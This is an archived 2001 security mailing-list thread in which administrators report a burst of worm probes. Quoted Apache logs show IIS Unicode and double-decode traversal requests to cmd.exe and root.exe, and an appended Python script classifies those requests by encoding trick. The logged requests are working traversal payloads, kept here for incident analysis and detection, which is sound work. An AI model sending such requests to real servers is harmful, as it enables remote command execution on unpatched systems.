I've gotten 721 hits just today for cmd.exe of some sort. We run apache so no worries, but this worm has hit faster than anything I've seen before. All from the people that share the same class A as us. This one must scan its own class C then B then A first. (I know I'm probably abusing the terms, but you all know what I mean.)

65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320

On 2001.09.18 10:24 "Portnoy, Gary" wrote:
> Greetings,
>
> I am suddenly seeing hundreds of Unicode traversal requests coming in from
> all over the world, many of them from previous CodeRed victims. I am
> guessing someone changed CodeBlue to make it spread faster, because before I
> saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen at least 20
> in the last hour. Just as a way to help fingerprint it, a few of the
> attempted exploits use the multiple decode vulnerability....
>
> -Gary-
>
> 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
>
> Gary Portnoy
> Network Administrator
> gportnoyat_private
>
> PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com

--
Jason Giglio
Information Technology Coordinator, Smyth Companies, Bedford VA
Phone: 540-586-2311x113
e-mail: jgiglioat_private
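Editor's added example (not part of either message above, and not code from either poster): a small Python classifier that parses Apache access-log lines like the ones quoted and tags each request by the technique it uses, so the "fingerprint" Gary suggests can be done mechanically. It decodes the path twice, the way an IIS box vulnerable to the double-decode bug (MS01-026) did, and folds the 0xC0/0xC1-led two-byte sequences from the Unicode traversal bug (MS00-078) into the `/` and `\` a lenient UTF-8 decoder yields, which is why `%c0%af`, `%c1%1c` and `%c1%9c` all end up as the same `../..` walk. The sample log lines are constructed for the example and modelled on the ones in the thread; the tag names, `fold_overlong` and `classify` are this example's own.

```python
"""Classify IIS Unicode / double-decode traversal probes in Apache access logs."""
import re
import urllib.parse
from collections import Counter

# Constructed sample (not the original log), modelled on the lines quoted above.
SAMPLE_LOG = """\
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
192.0.2.7 - - [18/Sep/2001:10:20:00 -0400] "GET /index.html HTTP/1.0" 200 1234
"""

# Apache common/combined log prefix: ip ident user [ts] "method target proto" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})')


def fold_overlong(data):
    """Collapse two-byte sequences led by 0xC0/0xC1 to the ASCII byte a lenient
    UTF-8 decoder produces: C0 AF and C0 2F -> '/', C1 1C and C1 9C -> '\\'.
    Valid UTF-8 never uses C0/C1 as a lead byte, so they are a signature on
    their own; folding them shows the path the target server actually walked."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def classify(target):
    """Return the set of probe techniques seen in one request target (hypothetical tag names)."""
    path = target.split('?', 1)[0]
    first = urllib.parse.unquote_to_bytes(path)    # what a single decode yields
    second = urllib.parse.unquote_to_bytes(first)  # what a second decode yields
    tags = set()
    if first != second:
        tags.add('double-decode')       # %255c, %252f, %25%35%63, %%35%63 ...
    if 0xC0 in second or 0xC1 in second:
        tags.add('overlong-utf8')       # %c0%af, %c0%2f, %c1%1c, %c1%9c
    canon = fold_overlong(second).replace(b'\\', b'/').lower()
    if b'/../' in canon:
        tags.add('traversal')
    if canon.endswith(b'/cmd.exe'):
        tags.add('cmd.exe')
    if canon.endswith(b'/root.exe'):
        tags.add('root.exe')            # cmd.exe copy that CodeRed II left in /scripts and /MSADC
    if re.match(rb'^/[a-z]/winnt/', canon):
        tags.add('drive-share')         # /c/, /d/ virtual dirs mapped onto drive roots
    return tags


def parse(log_text):
    """Yield one dict per parseable line (ip, ts, method, target, proto, status)."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def summarize(log_text):
    """Count technique tags and hits per source for every flagged request."""
    by_tag, by_src = Counter(), Counter()
    for rec in parse(log_text):
        tags = classify(rec['target'])
        if tags:
            by_tag.update(tags)
            by_src[rec['ip']] += 1
    return by_tag, by_src


if __name__ == '__main__':
    by_tag, by_src = summarize(SAMPLE_LOG)
    for tag, n in by_tag.most_common():
        print(f'{n:4d}  {tag}')
    for ip, n in by_src.most_common():
        print(f'{n:4d}  {ip}')
```

Run it over a real access log with `summarize(open('access_log').read())`; the per-source counter is what you would feed to a block list, and the `double-decode` versus `overlong-utf8` split is the fingerprint: a scanner that emits both families in one burst, plus `root.exe` and the `/c/`, `/d/` drive-share paths, is probing for machines left open by an earlier compromise as well as unpatched ones. Note that the `%%35%63` forms are malformed enough that Apache answered them with 400 rather than 404, as in the quoted log, but the classifier still resolves them because a lenient decoder leaves the stray `%` in place and then decodes it on the second pass.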
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:45:20 PDT